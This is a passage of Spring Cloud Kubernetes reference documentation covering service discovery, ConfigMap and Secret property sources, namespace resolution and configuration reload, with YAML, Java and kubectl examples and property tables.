and <<Secrets PropertySource,Secrets>>.\n<<propertysource-reload,Reload>> application properties when a ConfigMap or\nSecret changes.\n\n| [source,xml]\n.Fabric8 Dependency\n----\n<dependency>\n <groupId>org.springframework.cloud<\/groupId>\n <artifactId>spring-cloud-starter-kubernetes-fabric8-all<\/artifactId>\n<\/dependency>\n----\n\n[source,xml]\n.Kubernetes Client Dependency\n----\n<dependency>\n <groupId>org.springframework.cloud<\/groupId>\n <artifactId>spring-cloud-starter-kubernetes-client-all<\/artifactId>\n<\/dependency>\n----\n| All Spring Cloud Kubernetes features.\n|===\n\n== DiscoveryClient for Kubernetes\n\nThis project provides an implementation of https:\/\/github.com\/spring-cloud\/spring-cloud-commons\/blob\/master\/spring-cloud-commons\/src\/main\/java\/org\/springframework\/cloud\/client\/discovery\/DiscoveryClient.java[Discovery Client]\nfor https:\/\/kubernetes.io[Kubernetes].\nThis client lets you query Kubernetes endpoints (see https:\/\/kubernetes.io\/docs\/user-guide\/services\/[services]) by name.\nA service is typically exposed by the Kubernetes API server as a collection of endpoints that represent `http` and `https` addresses and that a client can\naccess from a Spring Boot application running as a pod.\n\nThis is something that you get for free by adding the following dependency inside your project:\n\n====\nHTTP Based `DiscoveryClient`\n[source,xml]\n----\n<dependency>\n <groupId>org.springframework.cloud<\/groupId>\n <artifactId>spring-cloud-starter-kubernetes-discoveryclient<\/artifactId>\n<\/dependency>\n----\n====\n\nNOTE: `spring-cloud-starter-kubernetes-discoveryclient` is designed to be used with the\n<<spring-cloud-kubernetes-discoveryserver, Spring Cloud Kubernetes DiscoveryServer>>.\n\n====\nFabric8 Kubernetes Client\n[source,xml]\n----\n<dependency>\n <groupId>org.springframework.cloud<\/groupId>\n <artifactId>spring-cloud-starter-kubernetes-fabric8<\/artifactId>\n<\/dependency>\n----\n====\n\n====\nKubernetes Java Client\n[source,xml]\n----\n<dependency>\n <groupId>org.springframework.cloud<\/groupId>\n <artifactId>spring-cloud-starter-kubernetes-client<\/artifactId>\n<\/dependency>\n----\n====\n\nTo enable loading of the `DiscoveryClient`, add `@EnableDiscoveryClient` to the according configuration or application class, as the following example shows:\n\n====\n[source,java]\n----\n@SpringBootApplication\n@EnableDiscoveryClient\npublic class Application {\n public static void main(String[] args) {\n SpringApplication.run(Application.class, args);\n }\n}\n----\n====\n\nThen you can inject the client in your code simply by autowiring it, as the following example shows:\n\n====\n[source,java]\n----\n@Autowired\nprivate DiscoveryClient discoveryClient;\n----\n====\n\nYou can choose to enable `DiscoveryClient` from all namespaces by setting the following property in `application.properties`:\n\n====\n[source]\n----\nspring.cloud.kubernetes.discovery.all-namespaces=true\n----\n====\n\nTo discover service endpoint addresses that are not marked as \"ready\" by the kubernetes api server, you can set the following property in `application.properties` (default: false):\n\n====\n[source]\n----\nspring.cloud.kubernetes.discovery.include-not-ready-addresses=true\n----\nNOTE: This might be useful when discovering services for monitoring purposes, and would enable inspecting the `\/health` endpoint of not-ready service instances.\n====\n\nIf your service exposes multiple ports, you will need to specify which port the `DiscoveryClient` should use.\nThe `DiscoveryClient` will choose the port using the following logic.\n\n1. If the service has a label `primary-port-name` it will use the port with the name specified in the label's value.\n2. If no label is present, then the port name specified in `spring.cloud.kubernetes.discovery.primary-port-name` will be used.\n3. If neither of the above are specified it will use the port named `https`.\n4. If none of the above conditions are met it will use the port named `http`.\n5. As a last resort it wil pick the first port in the list of ports.\n\nWARNING: The last option may result in non-deterministic behaviour.\nPlease make sure to configure your service and\/or application accordingly.\n\nBy default all of the ports and their names will be added to the metadata of the `ServiceInstance`.\n\nIf, for any reason, you need to disable the `DiscoveryClient`, you can set the following property in `application.properties`:\n\n====\n[source]\n----\nspring.cloud.kubernetes.discovery.enabled=false\n----\n====\n\nSome Spring Cloud components use the `DiscoveryClient` in order to obtain information about the local service instance. For\nthis to work, you need to align the Kubernetes service name with the `spring.application.name` property.\n\nNOTE: `spring.application.name` has no effect as far as the name registered for the application within Kubernetes\n\nSpring Cloud Kubernetes can also watch the Kubernetes service catalog for changes and update the\n`DiscoveryClient` implementation accordingly. In order to enable this functionality you need to add\n`@EnableScheduling` on a configuration class in your application.\n\n== Kubernetes native service discovery\n\nKubernetes itself is capable of (server side) service discovery (see: https:\/\/kubernetes.io\/docs\/concepts\/services-networking\/service\/#discovering-services).\nUsing native kubernetes service discovery ensures compatibility with additional tooling, such as Istio (https:\/\/istio.io), a service mesh that is capable of load balancing, circuit breaker, failover, and much more.\n\nThe caller service then need only refer to names resolvable in a particular Kubernetes cluster. A simple implementation might use a spring `RestTemplate` that refers to a fully qualified domain name (FQDN), such as `https:\/\/{service-name}.{namespace}.svc.{cluster}.local:{service-port}`.\n\nAdditionally, you can use Hystrix for:\n\n* Circuit breaker implementation on the caller side, by annotating the spring boot application class with `@EnableCircuitBreaker`\n* Fallback functionality, by annotating the respective method with `@HystrixCommand(fallbackMethod=`\n\n== Kubernetes PropertySource implementations\n\nThe most common approach to configuring your Spring Boot application is to create an `application.properties` or `application.yaml` or\nan `application-profile.properties` or `application-profile.yaml` file that contains key-value pairs that provide customization values to your\napplication or Spring Boot starters. You can override these properties by specifying system properties or environment\nvariables.\n\n[[configmap-propertysource]]\n=== Using a `ConfigMap` `PropertySource`\n\nKubernetes provides a resource named https:\/\/kubernetes.io\/docs\/user-guide\/configmap\/[`ConfigMap`] to externalize the\nparameters to pass to your application in the form of key-value pairs or embedded `application.properties` or `application.yaml` files.\nThe link:https:\/\/github.com\/spring-cloud\/spring-cloud-kubernetes\/tree\/master\/spring-cloud-kubernetes-fabric8-config[Spring Cloud Kubernetes Config] project makes Kubernetes `ConfigMap` instances available\nduring application bootstrapping and triggers hot reloading of beans or Spring context when changes are detected on\nobserved `ConfigMap` instances.\n\nThe default behavior is to create a `Fabric8ConfigMapPropertySource` based on a Kubernetes `ConfigMap` that has a `metadata.name` value of either the name of\nyour Spring application (as defined by its `spring.application.name` property) or a custom name defined within the\n`bootstrap.properties` file under the following key: `spring.cloud.kubernetes.config.name`.\n\nHowever, more advanced configuration is possible where you can use multiple `ConfigMap` instances.\nThe `spring.cloud.kubernetes.config.sources` list makes this possible.\nFor example, you could define the following `ConfigMap` instances:\n\n====\n[source,yaml]\n----\nspring:\n application:\n name: cloud-k8s-app\n cloud:\n kubernetes:\n config:\n name: default-name\n namespace: default-namespace\n sources:\n # Spring Cloud Kubernetes looks up a ConfigMap named c1 in namespace default-namespace\n - name: c1\n # Spring Cloud Kubernetes looks up a ConfigMap named default-name in whatever namespace n2\n - namespace: n2\n # Spring Cloud Kubernetes looks up a ConfigMap named c3 in namespace n3\n - namespace: n3\n name: c3\n----\n====\n\nIn the preceding example, if `spring.cloud.kubernetes.config.namespace` had not been set,\nthe `ConfigMap` named `c1` would be looked up in the namespace that the application runs.\nSee <<namespace-resolution,Namespace resolution>> to get a better understanding of how the namespace\nof the application is resolved.\n\n\nAny matching `ConfigMap` that is found is processed as follows:\n\n* Apply individual configuration properties.\n* Apply as `yaml` the content of any property named `application.yaml`.\n* Apply as a properties file the content of any property named `application.properties`.\n\nThe single exception to the aforementioned flow is when the `ConfigMap` contains a *single* key that indicates\nthe file is a YAML or properties file. In that case, the name of the key does NOT have to be `application.yaml` or\n`application.properties` (it can be anything) and the value of the property is treated correctly.\nThis features facilitates the use case where the `ConfigMap` was created by using something like the following:\n\n====\n[source]\n----\nkubectl create configmap game-config --from-file=\/path\/to\/app-config.yaml\n----\n====\n\nAssume that we have a Spring Boot application named `demo` that uses the following properties to read its thread pool\nconfiguration.\n\n* `pool.size.core`\n* `pool.size.maximum`\n\nThis can be externalized to config map in `yaml` format as follows:\n\n====\n[source,yaml]\n----\nkind: ConfigMap\napiVersion: v1\nmetadata:\n name: demo\ndata:\n pool.size.core: 1\n pool.size.max: 16\n----\n====\n\nIndividual properties work fine for most cases. However, sometimes, embedded `yaml` is more convenient. In this case, we\nuse a single property named `application.yaml` to embed our `yaml`, as follows:\n\n====\n[source,yaml]\n----\nkind: ConfigMap\napiVersion: v1\nmetadata:\n name: demo\ndata:\n application.yaml: |-\n pool:\n size:\n core: 1\n max:16\n----\n====\n\nThe following example also works:\n\n====\n[source,yaml]\n----\nkind: ConfigMap\napiVersion: v1\nmetadata:\n name: demo\ndata:\n custom-name.yaml: |-\n pool:\n size:\n core: 1\n max:16\n----\n====\n\nYou can also configure Spring Boot applications differently depending on active profiles that are merged together\nwhen the `ConfigMap` is read. You can provide different property values for different profiles by using an\n`application.properties` or `application.yaml` property, specifying profile-specific values, each in their own document\n(indicated by the `---` sequence), as follows:\n\n====\n[source,yaml]\n----\nkind: ConfigMap\napiVersion: v1\nmetadata:\n name: demo\ndata:\n application.yml: |-\n greeting:\n message: Say Hello to the World\n farewell:\n message: Say Goodbye\n ---\n spring:\n profiles: development\n greeting:\n message: Say Hello to the Developers\n farewell:\n message: Say Goodbye to the Developers\n ---\n spring:\n profiles: production\n greeting:\n message: Say Hello to the Ops\n----\n====\n\nIn the preceding case, the configuration loaded into your Spring Application with the `development` profile is as follows:\n\n====\n[source,yaml]\n----\n greeting:\n message: Say Hello to the Developers\n farewell:\n message: Say Goodbye to the Developers\n----\n====\n\nHowever, if the `production` profile is active, the configuration becomes:\n\n====\n[source,yaml]\n----\n greeting:\n message: Say Hello to the Ops\n farewell:\n message: Say Goodbye\n----\n====\n\nIf both profiles are active, the property that appears last within the `ConfigMap` overwrites any preceding values.\n\nAnother option is to create a different config map per profile and spring boot will automatically fetch it based\non active profiles\n\n====\n[source,yaml]\n----\nkind: ConfigMap\napiVersion: v1\nmetadata:\n name: demo\ndata:\n application.yml: |-\n greeting:\n message: Say Hello to the World\n farewell:\n message: Say Goodbye\n----\n====\n====\n[source,yaml]\n----\nkind: ConfigMap\napiVersion: v1\nmetadata:\n name: demo-development\ndata:\n application.yml: |-\n spring:\n profiles: development\n greeting:\n message: Say Hello to the Developers\n farewell:\n message: Say Goodbye to the Developers\n----\n====\n====\n[source,yaml]\n----\nkind: ConfigMap\napiVersion: v1\nmetadata:\n name: demo-production\ndata:\n application.yml: |-\n spring:\n profiles: production\n greeting:\n message: Say Hello to the Ops\n farewell:\n message: Say Goodbye\n----\n====\n\n\nTo tell Spring Boot which `profile` should be enabled at bootstrap, you can pass `SPRING_PROFILES_ACTIVE` environment variable.\n To do so, you can launch your Spring Boot application with an environment variable that you can define it in the PodSpec at the container specification.\n Deployment resource file, as follows:\n\n====\n[source,yaml]\n----\napiVersion: apps\/v1\nkind: Deployment\nmetadata:\n name: deployment-name\n labels:\n app: deployment-name\nspec:\n replicas: 1\n selector:\n matchLabels:\n app: deployment-name\n template:\n metadata:\n labels:\n app: deployment-name\n spec:\n containers:\n - name: container-name\n image: your-image\n env:\n - name: SPRING_PROFILES_ACTIVE\n value: \"development\"\n----\n====\n\nYou could run into a situation where there are multiple configs maps that have the same property names. For example:\n\n====\n[source,yaml]\n----\nkind: ConfigMap\napiVersion: v1\nmetadata:\n name: config-map-one\ndata:\n application.yml: |-\n greeting:\n message: Say Hello from one\n----\n====\n\nand\n\n====\n[source,yaml]\n----\nkind: ConfigMap\napiVersion: v1\nmetadata:\n name: config-map-two\ndata:\n application.yml: |-\n greeting:\n message: Say Hello from two\n----\n====\n\nDepending on the order in which you place these in `bootstrap.yaml|properties`, you might end up with an un-expected result (the last config map wins). For example:\n\n====\n[source,yaml]\n----\nspring:\n application:\n name: cloud-k8s-app\n cloud:\n kubernetes:\n config:\n namespace: default-namespace\n sources:\n - name: config-map-two\n - name: config-map-one\n----\n====\n\nwill result in property `greetings.message` being `Say Hello from one`.\n\nThere is a way to change this default configuration by specifying `useNameAsPrefix`. For example:\n\n====\n[source,yaml]\n----\nspring:\n application:\n name: with-prefix\n cloud:\n kubernetes:\n config:\n useNameAsPrefix: true\n namespace: default-namespace\n sources:\n - name: config-map-one\n useNameAsPrefix: false\n - name: config-map-two\n----\n====\n\nSuch a configuration will result in two properties being generated:\n\n - `greetings.message` equal to `Say Hello from one`.\n\n - `config-map-two.greetings.message` equal to `Say Hello from two`\n\nNotice that `spring.cloud.kubernetes.config.useNameAsPrefix` has a _lower_ priority than `spring.cloud.kubernetes.config.sources.useNameAsPrefix`.\nThis allows you to set a \"default\" strategy for all sources, at the same time allowing to override only a few.\n\nIf using the config map name is not an option, you can specify a different strategy, called : `explicitPrefix`. Since this is an _explicit_ prefix that\nyou select, it can only be supplied to the `sources` level. At the same time it has a higher priority than `useNameAsPrefix`. Let's suppose we have a third config map with these entries:\n\n\n====\n[source,yaml]\n----\nkind: ConfigMap\napiVersion: v1\nmetadata:\n name: config-map-three\ndata:\n application.yml: |-\n greeting:\n message: Say Hello from three\n----\n====\n\nA configuration like the one below:\n\n====\n[source,yaml]\n----\nspring:\n application:\n name: with-prefix\n cloud:\n kubernetes:\n config:\n useNameAsPrefix: true\n namespace: default-namespace\n sources:\n - name: config-map-one\n useNameAsPrefix: false\n - name: config-map-two\n explicitPrefix: two\n - name: config-map-three\n----\n====\n\nwill result in three properties being generated:\n\n - `greetings.message` equal to `Say Hello from one`.\n\n - `two.greetings.message` equal to `Say Hello from two`.\n\n - `config-map-three.greetings.message` equal to `Say Hello from three`.\n\nBy default, besides reading the config map that is specified in the `sources` configuration, Spring will also try to read\nall properties from \"profile aware\" sources. The easiest way to explain this is via an example. Let's suppose your application\nenables a profile called \"dev\" and you have a configuration like the one below:\n\n====\n[source,yaml]\n----\nspring:\n application:\n name: spring-k8s\n cloud:\n kubernetes:\n config:\n namespace: default-namespace\n sources:\n - name: config-map-one\n----\n====\n\nBesides reading the `config-map-one`, Spring will also try to read `config-map-one-dev`; in this particular order. Each active profile\ngenerates such a profile aware config map.\n\nThough your application should not be impacted by such a config map, it can be disabled if needed:\n\n====\n[source,yaml]\n----\nspring:\n application:\n name: spring-k8s\n cloud:\n kubernetes:\n config:\n includeProfileSpecificSources: false\n namespace: default-namespace\n sources:\n - name: config-map-one\n includeProfileSpecificSources: false\n----\n====\n\nNotice that just like before, there are two levels where you can specify this property: for all config maps or\nfor individual ones; the latter having a higher priority.\n\nNOTE: You should check the security configuration section. To access config maps from inside a pod you need to have the correct\nKubernetes service accounts, roles and role bindings.\n\nAnother option for using `ConfigMap` instances is to mount them into the Pod by running the Spring Cloud Kubernetes application\nand having Spring Cloud Kubernetes read them from the file system.\nThis behavior is controlled by the `spring.cloud.kubernetes.config.paths` property. You can use it in\naddition to or instead of the mechanism described earlier.\nYou can specify multiple (exact) file paths in `spring.cloud.kubernetes.config.paths` by using the `,` delimiter.\n\nNOTE: You have to provide the full exact path to each property file, because directories are not being recursively parsed.\n\nNOTE: If you use `spring.cloud.kubernetes.config.paths` or `spring.cloud.kubernetes.secrets.path` the automatic reload\nfunctionality will not work. You will need to make a `POST` request to the `\/actuator\/refresh` endpoint or\nrestart\/redeploy the application.\n\n[#config-map-fail-fast]\nIn some cases, your application may be unable to load some of your `ConfigMaps` using the Kubernetes API.\nIf you want your application to fail the start-up process in such cases, you can set\n`spring.cloud.kubernetes.config.fail-fast=true` to make the application start-up fail with an Exception.\n\n[#config-map-retry]\nYou can also make your application retry loading `ConfigMap` property sources on a failure. First, you need to\nset `spring.cloud.kubernetes.config.fail-fast=true`. Then you need to add `spring-retry`\nand `spring-boot-starter-aop` to your classpath. You can configure retry properties such as\nthe maximum number of attempts, backoff options like initial interval, multiplier, max interval by setting the\n`spring.cloud.kubernetes.config.retry.*` properties.\n\nNOTE: If you already have `spring-retry` and `spring-boot-starter-aop` on the classpath for some reason\nand want to enable fail-fast, but do not want retry to be enabled; you can disable retry for `ConfigMap` `PropertySources`\nby setting `spring.cloud.kubernetes.config.retry.enabled=false`.\n\n.Properties:\n[options=\"header,footer\"]\n|===\n| Name | Type | Default | Description\n| `spring.cloud.kubernetes.config.enabled` | `Boolean` | `true` | Enable ConfigMaps `PropertySource`\n| `spring.cloud.kubernetes.config.name` | `String` | `${spring.application.name}` | Sets the name of `ConfigMap` to look up\n| `spring.cloud.kubernetes.config.namespace` | `String` | Client namespace | Sets the Kubernetes namespace where to lookup\n| `spring.cloud.kubernetes.config.paths` | `List` | `null` | Sets the paths where `ConfigMap` instances are mounted\n| `spring.cloud.kubernetes.config.enableApi` | `Boolean` | `true` | Enable or disable consuming `ConfigMap` instances through APIs\n| `spring.cloud.kubernetes.config.fail-fast` | `Boolean` | `false` | Enable or disable failing the application start-up when an error occurred while loading a `ConfigMap`\n| `spring.cloud.kubernetes.config.retry.enabled` | `Boolean` | `true` | Enable or disable config retry.\n| `spring.cloud.kubernetes.config.retry.initial-interval` | `Long` | `1000` | Initial retry interval in milliseconds.\n| `spring.cloud.kubernetes.config.retry.max-attempts` | `Integer` | `6` | Maximum number of attempts.\n| `spring.cloud.kubernetes.config.retry.max-interval` | `Long` | `2000` | Maximum interval for backoff.\n| `spring.cloud.kubernetes.config.retry.multiplier` | `Double` | `1.1` | Multiplier for next interval.\n|===\n\n=== Secrets PropertySource\n\nKubernetes has the notion of https:\/\/kubernetes.io\/docs\/concepts\/configuration\/secret\/[Secrets] for storing\nsensitive data such as passwords, OAuth tokens, and so on. This project provides integration with `Secrets` to make secrets\naccessible by Spring Boot applications. You can explicitly enable or disable This feature by setting the `spring.cloud.kubernetes.secrets.enabled` property.\n\nWhen enabled, the `Fabric8SecretsPropertySource` looks up Kubernetes for `Secrets` from the following sources:\n\n. Reading recursively from secrets mounts\n. Named after the application (as defined by `spring.application.name`)\n. Matching some labels\n\n*Note:*\n\nBy default, consuming Secrets through the API (points 2 and 3 above) *is not enabled* for security reasons. The permission 'list' on secrets allows clients to inspect secrets values in the specified namespace.\nFurther, we recommend that containers share secrets through mounted volumes.\n\nIf you enable consuming Secrets through the API, we recommend that you limit access to Secrets by using an authorization policy, such as RBAC.\nFor more information about risks and best practices when consuming Secrets through the API refer to https:\/\/kubernetes.io\/docs\/concepts\/configuration\/secret\/#best-practices[this doc].\n\nIf the secrets are found, their data is made available to the application.\n\nAssume that we have a spring boot application named `demo` that uses properties to read its database\nconfiguration. We can create a Kubernetes secret by using the following command:\n\n====\n[source]\n----\nkubectl create secret generic db-secret --from-literal=username=user --from-literal=password=p455w0rd\n----\n====\n\nThe preceding command would create the following secret (which you can see by using `kubectl get secrets db-secret -o yaml`):\n\n====\n[source,yaml]\n----\napiVersion: v1\ndata:\n password: cDQ1NXcwcmQ=\n username: dXNlcg==\nkind: Secret\nmetadata:\n creationTimestamp: 2017-07-04T09:15:57Z\n name: db-secret\n namespace: default\n resourceVersion: \"357496\"\n selfLink: \/api\/v1\/namespaces\/default\/secrets\/db-secret\n uid: 63c89263-6099-11e7-b3da-76d6186905a8\ntype: Opaque\n----\n====\n\nNote that the data contains Base64-encoded versions of the literal provided by the `create` command.\n\nYour application can then use this secret -- for example, by exporting the secret's value as environment variables:\n\n====\n[source,yaml]\n----\napiVersion: v1\nkind: Deployment\nmetadata:\n name: ${project.artifactId}\nspec:\n template:\n spec:\n containers:\n - env:\n - name: DB_USERNAME\n valueFrom:\n secretKeyRef:\n name: db-secret\n key: username\n - name: DB_PASSWORD\n valueFrom:\n secretKeyRef:\n name: db-secret\n key: password\n----\n====\n\nYou can select the Secrets to consume in a number of ways:\n\n. By listing the directories where secrets are mapped:\n+\n====\n[source,bash]\n----\n-Dspring.cloud.kubernetes.secrets.paths=\/etc\/secrets\/db-secret,etc\/secrets\/postgresql\n----\n====\n+\nIf you have all the secrets mapped to a common root, you can set them like:\n+\n====\n[source,bash]\n----\n-Dspring.cloud.kubernetes.secrets.paths=\/etc\/secrets\n----\n====\n\n. By setting a named secret:\n+\n====\n[source,bash]\n----\n-Dspring.cloud.kubernetes.secrets.name=db-secret\n----\n====\n\n. By defining a list of labels:\n+\n====\n[source,bash]\n----\n-Dspring.cloud.kubernetes.secrets.labels.broker=activemq\n-Dspring.cloud.kubernetes.secrets.labels.db=postgresql\n----\n====\n\nAs the case with `ConfigMap`, more advanced configuration is also possible where you can use multiple `Secret`\ninstances. The `spring.cloud.kubernetes.secrets.sources` list makes this possible.\nFor example, you could define the following `Secret` instances:\n\n====\n[source,yaml]\n----\nspring:\n application:\n name: cloud-k8s-app\n cloud:\n kubernetes:\n secrets:\n name: default-name\n namespace: default-namespace\n sources:\n # Spring Cloud Kubernetes looks up a Secret named s1 in namespace default-namespace\n - name: s1\n # Spring Cloud Kubernetes looks up a Secret named default-name in namespace n2\n - namespace: n2\n # Spring Cloud Kubernetes looks up a Secret named s3 in namespace n3\n - namespace: n3\n name: s3\n----\n====\n\nIn the preceding example, if `spring.cloud.kubernetes.secrets.namespace` had not been set,\nthe `Secret` named `s1` would be looked up in the namespace that the application runs.\nSee <<namespace-resolution,namespace-resolution>> to get a better understanding of how the namespace\nof the application is resolved.\n\n<<config-map-fail-fast,Similar to the `ConfigMaps`>>; if you want your application to fail to start\nwhen it is unable to load `Secrets` property sources, you can set `spring.cloud.kubernetes.secrets.fail-fast=true`.\n\nIt is also possible to enable retry for `Secret` property sources <<config-map-retry,like the `ConfigMaps`>>.\nAs with the `ConfigMap` property sources, first you need to set `spring.cloud.kubernetes.secrets.fail-fast=true`.\nThen you need to add `spring-retry` and `spring-boot-starter-aop` to your classpath.\nRetry behavior of the `Secret` property sources can be configured by setting the `spring.cloud.kubernetes.secrets.retry.*`\nproperties.\n\nNOTE: If you already have `spring-retry` and `spring-boot-starter-aop` on the classpath for some reason\nand want to enable fail-fast, but do not want retry to be enabled; you can disable retry for `Secrets` `PropertySources`\nby setting `spring.cloud.kubernetes.secrets.retry.enabled=false`.\n\n.Properties:\n[options=\"header,footer\"]\n|===\n| Name | Type | Default | Description\n| `spring.cloud.kubernetes.secrets.enabled` | `Boolean` | `true` | Enable Secrets `PropertySource`\n| `spring.cloud.kubernetes.secrets.name` | `String` | `${spring.application.name}` | Sets the name of the secret to look up\n| `spring.cloud.kubernetes.secrets.namespace` | `String` | Client namespace | Sets the Kubernetes namespace where to look up\n| `spring.cloud.kubernetes.secrets.labels` | `Map` | `null` | Sets the labels used to lookup secrets\n| `spring.cloud.kubernetes.secrets.paths` | `List` | `null` | Sets the paths where secrets are mounted (example 1)\n| `spring.cloud.kubernetes.secrets.enableApi` | `Boolean` | `false` | Enables or disables consuming secrets through APIs (examples 2 and 3)\n| `spring.cloud.kubernetes.secrets.fail-fast` | `Boolean` | `false` | Enable or disable failing the application start-up when an error occurred while loading a `Secret`\n| `spring.cloud.kubernetes.secrets.retry.enabled` | `Boolean` | `true` | Enable or disable secrets retry.\n| `spring.cloud.kubernetes.secrets.retry.initial-interval` | `Long` | `1000` | Initial retry interval in milliseconds.\n| `spring.cloud.kubernetes.secrets.retry.max-attempts` | `Integer` | `6` | Maximum number of attempts.\n| `spring.cloud.kubernetes.secrets.retry.max-interval` | `Long` | `2000` | Maximum interval for backoff.\n| `spring.cloud.kubernetes.secrets.retry.multiplier` | `Double` | `1.1` | Multiplier for next interval.\n|===\n\nNotes:\n\n* The `spring.cloud.kubernetes.secrets.labels` property behaves as defined by\nhttps:\/\/github.com\/spring-projects\/spring-boot\/wiki\/Spring-Boot-Configuration-Binding#map-based-binding[Map-based binding].\n* The `spring.cloud.kubernetes.secrets.paths` property behaves as defined by\nhttps:\/\/github.com\/spring-projects\/spring-boot\/wiki\/Spring-Boot-Configuration-Binding#collection-based-binding[Collection-based binding].\n* Access to secrets through the API may be restricted for security reasons. The preferred way is to mount secrets to the Pod.\n\nYou can find an example of an application that uses secrets (though it has not been updated to use the new `spring-cloud-kubernetes` project) at\nhttps:\/\/github.com\/fabric8-quickstarts\/spring-boot-camel-config[spring-boot-camel-config]\n\n[[namespace-resolution]]\n=== Namespace resolution\nFinding an application namespace happens on a best-effort basis. There are some steps that we iterate in order\nto find it. The easiest and most common one, is to specify it in the proper configuration, for example:\n\n====\n[source,yaml]\n----\nspring:\n application:\n name: app\n cloud:\n kubernetes:\n secrets:\n name: secret\n namespace: default\n sources:\n # Spring Cloud Kubernetes looks up a Secret named 'a' in namespace 'default'\n - name: a\n # Spring Cloud Kubernetes looks up a Secret named 'secret' in namespace 'b'\n - namespace: b\n # Spring Cloud Kubernetes looks up a Secret named 'd' in namespace 'c'\n - namespace: c\n name: d\n----\n====\n\nRemember that the same can be done for config maps. If such a namespace is not specified, it will be read (in this order):\n\n1. from property `spring.cloud.kubernetes.client.namespace`\n2. from a String residing in a file denoted by `spring.cloud.kubernetes.client.serviceAccountNamespacePath` property\n3. from a String residing in `\/var\/run\/secrets\/kubernetes.io\/serviceaccount\/namespace` file\n(kubernetes default namespace path)\n4. from a designated client method call (for example fabric8's : `KubernetesClient::getNamespace`), if the client provides\nsuch a method. This, in turn, could be configured via environment properties. For example fabric8 client can be configured via\n\"KUBERNETES_NAMESPACE\" property; consult the client documentation for exact details.\n\nFailure to find a namespace from the above steps will result in an Exception being raised.\n\n=== `PropertySource` Reload\n\nWARNING: This functionality has been deprecated in the 2020.0 release. Please see\nthe <<spring-cloud-kubernetes-configuration-watcher>> controller for an alternative way\nto achieve the same functionality.\n\nSome applications may need to detect changes on external property sources and update their internal status to reflect the new configuration.\nThe reload feature of Spring Cloud Kubernetes is able to trigger an application reload when a related `ConfigMap` or\n`Secret` changes.\n\nBy default, this feature is disabled. You can enable it by using the `spring.cloud.kubernetes.reload.enabled=true` configuration property (for example, in the `application.properties` file).\n\nThe following levels of reload are supported (by setting the `spring.cloud.kubernetes.reload.strategy` property):\n\n* `refresh` (default): Only configuration beans annotated with `@ConfigurationProperties` or `@RefreshScope` are reloaded.\nThis reload level leverages the refresh feature of Spring Cloud Context.\n\n* `restart_context`: the whole Spring `ApplicationContext` is gracefully restarted. Beans are recreated with the new configuration.\nIn order for the restart context functionality to work properly you must enable and expose the restart actuator endpoint\n[source,yaml]\n====\n----\nmanagement:\n endpoint:\n restart:\n enabled: true\n endpoints:\n web:\n exposure:\n include: restart\n----\n====\n\n* `shutdown`: the Spring `ApplicationContext` is shut down to activate a restart of the container.\n When you use this level, make sure that the lifecycle of all non-daemon threads is bound to the `ApplicationContext`\nand that a replication controller or replica set is configured to restart the pod.\n\nAssuming that the reload feature is enabled with default settings (`refresh` mode), the following bean is refreshed when the config map changes:\n\n====\n[java, source]\n----\n@Configuration\n@ConfigurationProperties(prefix = \"bean\")\npublic class MyConfig {\n\n private String message = \"a message that can be changed live\";\n\n \/\/ getter and setters\n\n}\n----\n====\n\nTo see that changes effectively happen, you can create another bean that prints the message periodically, as follows\n\n====\n[source,java]\n----\n@Component\npublic class MyBean {\n\n @Autowired\n private MyConfig config;\n\n @Scheduled(fixedDelay = 5000)\n public void hello() {\n System.out.println(\"The message is: \" + config.getMessage());\n }\n}\n----\n====\n\nYou can change the message printed by the application by using a `ConfigMap`, as follows:\n\n====\n[source,yaml]\n----\napiVersion: v1\nkind: ConfigMap\nmetadata:\n name: reload-example\ndata:\n application.properties: |-\n bean.message=Hello World!\n----\n====\n\nAny change to the property named `bean.message` in the `ConfigMap` associated with the pod is reflected in the\noutput. More generally speaking, changes associated to properties prefixed with the value defined by the `prefix`\nfield of the `@ConfigurationProperties` annotation are detected and reflected in the application.\n<<configmap-propertysource,Associating a `ConfigMap` with a pod>> is explained earlier in this chapter.\n\nThe full example is available in https:\/\/github.com\/spring-cloud\/spring-cloud-kubernetes\/tree\/main\/spring-cloud-kubernetes-examples\/kubernetes-reload-example[`spring-cloud-kubernetes-reload-example`].\n\nThe reload feature supports two operating modes:\n* Event (default): Watches for changes in config maps or secrets by using the Kubernetes API (web socket).\nAny event produces a re-check on the configuration and, in case of changes, a reload.\nThe `view` role on the service account is required in order to listen for config map changes. A higher level role (such as `edit`) is required for secrets\n(by default, secrets are not monitored).\n* Polling: Periodically re-creates the configuration from config maps and secrets to see if it has changed.\nYou can configure the polling period by using the `spring.cloud.kubernetes.reload.period` property and defaults to 15 seconds.\nIt requires the same role as the monitored property source.\nThis means, for example, that using polling on file-mounted secret sources does not require particular privileges.\n\n.Properties:\n[options=\"header,footer\"]\n|===\n| Name | Type | Default | Description\n| `spring.cloud.kubernetes.reload.enabled` | `Boolean` | `false` | Enables monitoring of property sources and configuration reload\n| `spring.cloud.kubernetes.reload.monitoring-config-maps` | `Boolean` | `true` | Allow monitoring changes in config maps\n| `spring.cloud.kubernetes.reload.monitoring-secrets` | `Boolean` | `false` | Allow monitoring changes in secrets\n| `spring.cloud.kubernetes.reload.strategy` | `Enum` | `refresh` | The strategy to use when firing a reload (`refresh`, `restart_context`, or `shutdown`)\n| `spring.cloud.kubernetes.reload.mode` | `Enum` | `event` | Specifies how to listen for changes in property sources (`event` or `polling`)\n| `spring.cloud.kubernetes.reload.period` | `Duration`| `15s` | The period for verifying changes when using the `polling` strategy\n|===\n\nNotes:\n* You should not use properties under `spring.cloud.kubernetes.reload` in config maps or secrets. Changing such properties at runtime may lead to unexpected results.\n* Deleting a property or the whole config map does not restore the original state of the beans when you use the `refresh` level.\n\n== Kubernetes Ecosystem Awareness\n\nAll features described earlier in this guide work equally well, regardless of whether your application is running inside\nKubernetes. This is really helpful for development and troubleshooting.\nFrom a development point of view, this lets you start your Spring Boot application and debug one\nof the modules that is part of this project. You need not deploy it in Kubernetes,\nas the code of the project relies on the\nhttps:\/\/github.com\/fabric8io\/kubernetes-client[Fabric8 Kubernetes Java client], which is a fluent DSL that can\ncommunicate by using `http` protocol to the REST API of the Kubernetes Server.\n\nKubernetes awareness is based on Spring Boot API, specifically on https:\/\/docs.spring.io\/spring-boot\/docs\/current\/api\/org\/springframework\/boot\/autoconfigure\/condition\/ConditionalOnCloudPlatform.html[ConditionalOnCloudPlatform].\nThat property will auto-detect if your application is currently deployed in kubernetes or not. It is possible to override\nthat setting via `spring.main.cloud-platform`.\n\nFor example, if you need to test some features, but do not want to deploy to a cluster, it is enough to set 